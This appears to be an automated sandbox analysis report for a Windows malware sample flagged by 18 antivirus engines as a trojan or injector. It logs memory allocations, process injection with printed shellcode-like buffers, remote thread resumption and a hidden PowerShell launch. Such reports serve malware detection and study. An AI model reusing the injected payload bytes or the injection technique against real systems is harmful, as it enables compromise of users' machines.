NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00160000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00010000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00200000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00210000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00220000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0
NtAllocateVirtualMemory May 24, 2022, 6:27 p.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000574	1	0	0

Potential code injection by writing to the memory of another process (12 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2352 injected into non-child 3012
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: hÿhÿ×IvÕ0wkernel32.dllÿHúBhùB¾tþsùBÉþspý~\|ùBlaþsQyþsDpý~ùB:þs6;t(úBmØÿsðùBðùBÿÿÿÿ\úBHúBÖ;k»%k8úBè%kúB¨Þ¨Þ8úBñµlùµllúBBk base_address: 0x000f0000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: GetProcAddress base_address: 0x00100000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: kernel32.dll base_address: 0x00110000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: Õ0w"vEv base_address: 0x00160000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøh¾lh¾lèQ©þÿPèS©þÿEèh¨¾lh¾lè9©þÿPè;©þÿEäh¸¾lh¾lè!©þÿPè#©þÿEàþu}ðëÎ×ÃèÏûÿÿEðUüÃè*ûÿÿEìjjMàº½lÃèèûÿÿØÛtjÿSèº©þÿEôPSè¨þÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00010000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: LoadLibraryA base_address: 0x001f0000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: kernel32.dll base_address: 0x00200000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: Õ0w"vEv base_address: 0x00210000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøh¾lh¾lèQ©þÿPèS©þÿEèh¨¾lh¾lè9©þÿPè;©þÿEäh¸¾lh¾lè!©þÿPè#©þÿEàþu}ðëÎ×ÃèÏûÿÿEðUüÃè*ûÿÿEìjjMàº½lÃèèûÿÿØÛtjÿSèº©þÿEôPSè¨þÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00220000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: YY base_address: 0x00240000 process_identifier: 3012 process_handle: 0x00000574	1	1	0
WriteProcessMemory May 24, 2022, 6:27 p.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔ´lèÑþÿ3ÀUh½ldÿ0d ÆEÿG<ÇEô»Ãj@h0Eô@PPEô@4ÃPè«þÿEð}ðt0hjEðPè«þÿj@h0Eô@PPEô@4ÃPVèn«þÿEð}ðuû0vEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèj«þÿjjMèºÐ»lÆè_ýÿÿÀtÆEÿ3ÀZYYdh½lEÔ´lè¤þÿÃ base_address: 0x00250000 process_identifier: 3012 process_handle: 0x00000574	1	1	0

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (moderate confidence)
McAfee	Artemis!F05A460E312D
CrowdStrike	win/malicious_confidence_60% (W)
BitDefenderTheta	Gen:NN.ZelphiF.34682.@GW@aqrQ4Wki
Symantec	Scr.MalPbs!gen1
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	RATX-gen [Trj]
McAfee-GW-Edition	BehavesLike.Win32.Dropper.fh
SentinelOne	Static AI - Suspicious PE
Sophos	Mal/Generic-S
APEX	Malicious
VBA32	BScope.Trojan.Hesv
Rising	Trojan.Generic@AI.81 (RDML:Hvjy8l787Y3m9eh1r/snfw)
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EQPQ!tr
AVG	RATX-gen [Trj]

Network activity contains more than one unique useragent (2 events)

process	vbc.exe				useragent	lVali
process	vbc.exe				useragent	82

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2536 resumed a thread in remote process 2596
Process injection	Process 2596 resumed a thread in remote process 2828
NtResumeThread May 24, 2022, 6:27 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2596	1	0	0
NtResumeThread May 24, 2022, 6:27 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2828	1	0	0

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-noninteractive				value	Prevents creating an interactive prompt for the user

Generates some ICMP traffic

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All